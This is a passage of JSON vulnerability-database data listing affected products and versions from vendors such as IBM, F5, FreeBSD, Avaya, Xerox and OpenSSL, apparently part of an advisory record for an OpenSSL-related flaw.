"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58450" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5845072.060.134.32804" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5740061.132.224.35203" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "87000" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35307160" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "big-ip edge clients for windows", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7110" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6500" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087180" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "66550" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78550" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "hp-ux b.11.31 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408956" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93010" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.0.6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8807903" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge clients for windows", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7101" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36305466" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7845072.040.134.32804" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x4407917" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36505460" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087220" }, { "model": "big-ip edge clients for mac os", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "x7080" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "storage server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "79700" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7970072.200.134.32804" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7080" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7220072.030.134.32804" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9303072.180.134.32804" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.0.5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5735061.132.224.35203" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7855072.040.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6655072.060.134.32804" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ssl for openvms", "scope": "eq", 